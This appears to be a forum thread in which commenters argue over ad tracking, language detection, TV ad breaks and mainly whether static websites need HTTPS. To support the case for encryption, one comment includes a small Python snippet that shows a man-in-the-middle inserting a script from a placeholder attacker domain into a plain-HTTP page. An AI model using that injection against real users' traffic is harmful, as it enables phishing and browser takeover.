This is what I find difficult about these things: we (mostly) intuitively know that in some cases it's okay to use information about users to tweak their experience, while we also know that what Facebook/Google/etc. are doing is absolutely wrong.
The big question is, where do we draw the (legal) line?
Don't browsers send a header (Accept-Language) telling the server what language they expect?
I live in Belgium, where there are three national languages, and my preference isn't even one of them. Please use whatever language my browser tells you to (English).
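The header in question is Accept-Language, which carries the user's ranked language preferences. A minimal sketch of parsing it on the server side (the helper name is mine, not from any framework):

```python
def parse_accept_language(header: str) -> list[tuple[str, float]]:
    """Parse an Accept-Language header into (tag, quality) pairs,
    highest quality first. Simplified: ignores wildcards and ranges."""
    langs = []
    for part in header.split(","):
        part = part.strip()
        if not part:
            continue
        if ";q=" in part:
            tag, q = part.split(";q=", 1)
            try:
                quality = float(q)
            except ValueError:
                quality = 0.0
        else:
            tag, quality = part, 1.0
        langs.append((tag.strip(), quality))
    return sorted(langs, key=lambda pair: -pair[1])

# A Belgian user whose browser is set to prefer English:
print(parse_accept_language("en;q=1.0, nl;q=0.5, fr;q=0.3"))
```

A server honoring this header would serve the first language it supports from the sorted list, rather than guessing from the visitor's IP geolocation.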
I think the correct analogy would be that there's a corner of the screen where an advertisement plays constantly while whatever show you're watching runs.
Obviously the advertisement is going to distract you from time to time, and you won't have your full attention on the show.
Is forcibly breaking away from the content you want to watch every 10 minutes to show ads not distracting?
Or is the two minutes of recapped content after each break, repeating what happened before you got distracted by the ads, not also distracting?
Have you ever watched a show with the ads removed and seen how much of it is actually repeated just because of ad placements?
Just because it's not on screen the entire time doesn't mean it isn't a distraction. TV ad breaks are one of the best methods for producers - guaranteed impressions, broad audiences, official metrics, etc. - whilst also being the worst for consumers. An hour of my time set aside for watching something I enjoy now contains 20 minutes of content I don't care about at all, and cannot skip/bypass if not interested, and the 40 minutes of content is closer to 30 because of repeated content either side of ad breaks.
I haven't worked with ASP.NET Core for a while now, but what exactly do you refer to with "ridiculously bloated code"?
async/await doesn't add much extra code beyond the occasional await keyword, does it?
Yes, that's just the DI that does that, the async/await just gives you ridiculous call stacks and untraceable errors, usually for zero performance gains.
"We designed this service to reliably hold a huge amount of data. This setup will serve you best if it’s used to store compressed data archives or backups."
"Do you offer backups with this service?"
"Unfortunately, no. Users have to regularly back up the data themselves."
That sounds a little contradictory.
I don't disagree with what you're saying, but I feel HTTPS everywhere does not belong in that list.
Secure by default doesn't sound evil to me, and Let's Encrypt made it easy enough to get free HTTPS certificates (and for non technical people, almost all hosting services I've seen offer it out of the box)
A static blog that takes no user input/data will still leak the pages on that blog you visit, and the times you visited them. Knowing that you went to a particular page on a particular blog is a lot more information than knowing if you went to a domain. If I know you read about Conan the Barbarian on three different blogs, I know to send you ads about Conan the Barbarian (as a trivial example.)
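To make the difference concrete: a passive observer on the network sees the full URL of a plain-HTTP request, but for HTTPS only roughly the hostname (via SNI and DNS). A simplified illustration (hostnames hypothetical; this glosses over Encrypted Client Hello and DNS details):

```python
from urllib.parse import urlsplit

def observer_view(url: str, tls: bool) -> str:
    """What a passive network observer learns about a request (simplified)."""
    parts = urlsplit(url)
    if tls:
        # With HTTPS, only the hostname leaks (SNI / DNS lookup).
        return parts.hostname
    # With plain HTTP, the full path and query string are visible too.
    return parts.hostname + parts.path

print(observer_view("http://blog.example/conan-the-barbarian", tls=False))
print(observer_view("https://blog.example/conan-the-barbarian", tls=True))
```

The first case reveals which article you read; the second only that you visited the blog at all.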
I think authors want to ensure their writings are not edited, censored or otherwise tampered with while in transit to the reader. HTTPS isn't perfect, but this is one of the benefits it provides. It isn't only about encryption or privacy.
The NSA (and who knows who else) has the ability to tamper with TLS encrypted traffic, so that’s a moot point. Also easily defeated in the client by adding a rogue proxy and CA.
I don't think there's anywhere near a consensus that your statement here is true. In fact, I think it would be a surprise to the majority of the tech community if that were the case.
In a perfect world, sure, static sites don't need HTTPS. However, ISPs and other malevolent middle-parties have demonstrated why HTTPS is a must.
We've seen everything from injecting tracking javascript, to injecting their own ads, to outright replacing content with unrelated content that the ISP wants to push.
In a perfect world, we would not secure the transport but the content itself, and everyone would be able to build their own web of trust. Why do I as a (web) publisher and my readers have to rely on the grace of just a few root CAs? I know it's technically possible to import my home-made CA cert into browsers, but it's not made easy: my server cert cannot be signed by more than one party, and Android requires a lock screen code before it allows custom CA certs. When I first saw this I was like "why the hell?" - I mean, I can imagine it's a safety feature for ordinary users, but come on!
That link does not load for me. The redirect to the captcha is broken. Sincere question - is that the point? In other words, does Google block the captcha from loading since the site isn't using HTTPS?
Let's Encrypt has a de facto monopoly. I think we could have mandated HTTPS if we had dozens of projects like Let's Encrypt; otherwise this is just handing over too much control to one organisation.
LetsEncrypt doesn't owe anyone free certificates, either. The point is that AWS isn't an alternative unless you're spending money with AWS. Nobody is wondering whether you can get a certificate by paying someone.
> Let's Encrypt made it easy enough to get free HTTPS certificates
Just checked.
My hosting provider asks twice the money for an SSL add-on (which includes a unique IP, unlimited subdomains, and a free certificate). They wrote on the support forum that I need that add-on regardless of which certificate I'm going to use - the included free one, or any other like Let's Encrypt.
Not gonna switch hosting nor pay 2x more for it just to please Google.
My web site has no comments or other user-generated content, runs no CMS, uses no cookies, collects no data except standard web server logs, hosts no executables, and has no secret nor security sensitive content.
At Starbucks I can inject arbitrary content into the browser of anyone who visits your site over HTTP and take control of their browser.
Furthermore, congrats on your site but you’re 0.01% of sites like that. Should we keep an insecure web because your hosting provider is ripping you off? TLS is easy and free in 2021.
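The rewrite an on-path attacker (a hostile hotspot, a meddling ISP) can apply to a plain-HTTP response is trivial. A minimal sketch, with a hypothetical attacker domain:

```python
ATTACKER_SCRIPT = b'<script src="https://attacker.example/x.js"></script>'

def inject(html: bytes, payload: bytes = ATTACKER_SCRIPT) -> bytes:
    """Rewrite a plain-HTTP HTML body in transit, as an on-path attacker can.

    Over HTTPS the same modification would break the TLS record's integrity
    check, and the browser would abort the connection instead of rendering."""
    return html.replace(b"</body>", payload + b"</body>")

page = b"<html><body><h1>My static blog</h1></body></html>"
print(inject(page))
```

The injected script then has full control of the page's DOM, regardless of how harmless the original content was.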
> Furthermore, congrats on your site but you’re 0.01% of sites like that.
Thanks to the rise of the almighty platforms we've lost the will and know-how to do it ourselves.
> TLS is easy and free in 2021.
Only if you're relying on complicated cloud infra or (non-free) managed providers that do everything for you. It's a lot of work to set this up on your own.
It's impossible to be simple at this point. It's like the automotive industry which collectively decided to use computers for everything. You can't repair things yourself now. It's ironic, too, because now the industry finds itself with a chip shortage. I can imagine lots of scenarios where our complicated infrastructure requirements bite us.
There should always be the option of not using TLS. It should be first-class and not require expertise to access or use.
It's actually very easy to set up a TLS server using certificates from Let's Encrypt or any other ACME-compliant certificate provider. If you're using Apache, mod_md[0] will manage all the details for you. After enabling mod_md and mod_ssl, a simple TLS server only requires a few lines of extra configuration compared to a basic non-TLS site:
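A minimal sketch of what that Apache configuration looks like (domain names and paths are placeholders; check the mod_md documentation for your distribution's module paths):

```apache
# Debian/Ubuntu: a2enmod md ssl

# Email used for ACME account registration
ServerAdmin webmaster@example.com
# Accept the certificate authority's terms of service
MDCertificateAgreement accepted
# mod_md obtains and renews certificates for these names automatically
MDomain example.com www.example.com

<VirtualHost *:443>
    ServerName example.com
    DocumentRoot /var/www/example
    # No SSLCertificateFile/SSLCertificateKeyFile needed; mod_md supplies them
    SSLEngine on
</VirtualHost>
```

After a reload, mod_md completes the ACME challenge in the background and a second reload activates the certificate; renewals happen without intervention.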
If you're using Nginx rather than Apache I believe it still requires an external script to handle certificate renewal, but the process remains fairly simple. The same scripts will also work with Apache if you don't want to use mod_md.
Users can decide: find a browser which doesn't put importance on cert usage. You'll have a hard time, because every browser manufacturer realizes that 99.9% of users cannot make sound security decisions, so they shouldn't have to. Things should default to secure.
There’s a trade off between protecting users and having a 100% free and open internet. An insecure internet is untrustworthy and therefore not useful, IMO.
This is far more common than you think. ISPs, hotels, cafes, and mobile providers do this en masse. Have you forgotten the NSA's "SSL added and removed here"? That was a highly targeted attack against infrastructure. What we're discussing here is 10x easier to achieve.
> And even if it was the risk is just crap injected into someone’s blog.
That “crap injected” has full control over the DOM, any authentication, and everything displayed. How many of your users would happily put their creds into a fake login modal that popped up claiming to be SSO for a popular identity provider?
Without encryption, an active attacker could redirect users to a different website, which would collect more data than your website normally does. They could also inject ads and JavaScript into users' sessions through your website.
Redirecting an unencrypted webpage could be the first step a hacker uses to take over a user's computer. It's best to minimize attack vectors as much as possible.
It doesn’t matter much what your web site has today. If it’s available over HTTP an attacker can inject whatever it wants into the page without too much trouble at all.
I think you're mixing different problems here. You can't blame Google or HTTPS if your hosting provider is trying to rip you off. You don't need a unique IP or unlimited subdomains to get an SSL certificate; those are just requirements your provider invented.
Your hosting provider sounds incompetent. There is no need for a unique IP to host a TLS-encrypted website; SNI support is ubiquitous nowadays. Let's Encrypt issues wildcard certificates for free as well.
There is no technical reason for asking 2x more money for encryption in 2021.